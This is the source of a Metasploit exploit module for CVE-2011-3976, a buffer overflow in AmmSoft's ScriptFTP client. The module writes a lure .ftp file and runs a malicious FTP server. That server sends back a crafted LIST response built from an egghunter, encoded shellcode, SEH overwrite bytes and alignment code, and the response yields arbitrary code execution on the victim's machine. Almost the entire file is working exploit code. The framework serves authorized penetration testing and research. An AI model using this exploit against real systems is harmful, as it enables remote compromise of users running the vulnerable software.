Path: blob/master/modules/exploits/windows/ftp/scriptftp_list.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::FtpServer9include Msf::Exploit::FILEFORMAT10include Msf::Exploit::Egghunter1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'ScriptFTP LIST Remote Buffer Overflow',17'Description' => %q{18AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow19vulnerability that is triggered when processing a sufficiently long20filename during a FTP LIST command resulting in overwriting the21exception handler. Social engineering of executing a specially crafted22ftp file by double click will result in connecting to our malicious23server and perform arbitrary code execution which allows the attacker to24gain the same rights as the user running ScriptFTP. This vulnerability25affects versions 3.3 and earlier.26},27'License' => MSF_LICENSE,28'Author' => [29'modpr0be', # Vulnerability discovery and original exploit30'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module31'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module32],33'References' => [34[ 'CVE', '2011-3976' ],35[ 'OSVDB', '75633' ],36[ 'EDB', '17876' ],37[ 'US-CERT-VU', '440219' ]38],39'DefaultOptions' => {40'EXITFUNC' => 'thread',41'DisablePayloadHandler' => false42},43'Payload' => {44'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",45'EncoderType' => Msf::Encoder::Type::AlphanumMixed,46'EncoderOptions' =>47{48'BufferRegister' => 'EDI', # Egghunter jmp edi49}50},51'Platform' => 'win',52'Targets' => [53# CALL DWORD PTR SS:[EBP-4]54# scriptftp.exe - File version=Build 3/9/200955[ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],56],57'Privileged' => false,58'DisclosureDate' => '2011-10-12',59'DefaultTarget' => 0,60'Notes' => {61'Reliability' => UNKNOWN_RELIABILITY,62'Stability' => UNKNOWN_STABILITY,63'SideEffects' => UNKNOWN_SIDE_EFFECTS64}65)66)6768register_options(69[70OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),71]72)73end7475def setup76if datastore['SRVHOST'] == '0.0.0.0'77lhost = Rex::Socket.source_address('50.50.50.50')78else79lhost = datastore['SRVHOST']80end8182ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"83ftp_file << "SETPASSIVE(ENABLED)\r\n"84ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"85ftp_file << "CLOSEHOST\r\n"8687print_status("Creating '#{datastore['FILENAME']}'...")88file_create(ftp_file)89super90end9192def on_client_unknown_command(c, cmd, arg)93c.put("200 OK\r\n")94end9596def on_client_command_list(c, arg)97conn = establish_data_connection(c)98if (not conn)99c.put("425 Can't build data connection\r\n")100return101end102103print_status(" - Data connection set up")104code = 150105c.put("#{code} Here comes the directory listing.\r\n")106107code = 226108c.put("#{code} Directory send ok.\r\n")109110eggoptions =111{112:checksum => false,113:eggtag => 'cure'114}115116hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)117118# Encode with alphamixed, then unicode mixed119[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|120enc = framework.encoders.create(name)121if name =~ /unicode/122# aligned to ESP & EAX123enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })124else125enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })126end127# NOTE: we already eliminated badchars128hunter = enc.encode(hunter, nil, nil, platform)129if name =~ /alpha/130# insert getpc_stub & align EDX, unicode encoder friendly.131# Hardcoded stub is not an issue here because it gets encoded anyway132getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"133hunter = getpc_stub + hunter134end135}136137unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL138139nseh = "\x61" << unicode_nop140seh = target.ret141142alignment = "\x54" # PUSH ESP143alignment << unicode_nop144alignment << "\x58" # POP EAX145alignment << unicode_nop146alignment << "\x05\x12\x11" # ADD EAX,11001200147alignment << unicode_nop148alignment << "\x2d\x01\x01" # SUB EAX,1000100149alignment << unicode_nop150alignment << "\x2d\x01\x10" # SUB EAX,10000100151alignment << unicode_nop152alignment << "\x50" # PUSH EAX153alignment << unicode_nop154alignment << "\xc3" # RETN155156buffer = rand_text_alpha(656)157buffer << hunter158buffer << rand_text_alpha(target['Offset'] - buffer.length)159buffer << nseh160buffer << seh161buffer << alignment162buffer << rand_text_alpha(500)163buffer << egg164165print_status(" - Sending directory list via data connection")166dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"167dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"168dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"169170conn.put(dirlist)171conn.close172return173end174end175176177